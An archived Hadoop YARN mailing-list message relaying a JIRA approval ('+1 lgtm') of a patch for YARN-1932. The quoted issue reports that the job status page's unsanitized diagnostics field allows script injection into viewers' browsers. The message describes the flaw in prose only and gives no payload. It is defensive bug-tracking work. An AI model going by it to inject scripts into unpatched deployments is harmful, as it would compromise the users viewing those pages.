hadoop-yarn-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Jason Lowe (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (YARN-1932) Javascript injection on the job status page
Date Fri, 18 Apr 2014 16:42:18 GMT

    [ https://issues.apache.org/jira/browse/YARN-1932?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13974227#comment-13974227
] 

Jason Lowe commented on YARN-1932:
----------------------------------

+1 lgtm.  I'll commit this later today unless there are any objections.

> Javascript injection on the job status page
> -------------------------------------------
>
>                 Key: YARN-1932
>                 URL: https://issues.apache.org/jira/browse/YARN-1932
>             Project: Hadoop YARN
>          Issue Type: Bug
>    Affects Versions: 3.0.0, 0.23.9, 2.5.0
>            Reporter: Mit Desai
>            Assignee: Mit Desai
>            Priority: Blocker
>         Attachments: YARN-1932.patch, YARN-1932.patch
>
>
> Scripts can be injected into the job status page as the diagnostics field is
> not sanitized. Whatever string you set there will show up to the jobs page as it is ...
ie. if you put any script commands, they will be executed in the browser of the user who is
opening the page.
> We need escaping the diagnostic string in order to not run the scripts.



--
This message was sent by Atlassian JIRA
(v6.2#6252)

Mime
View raw message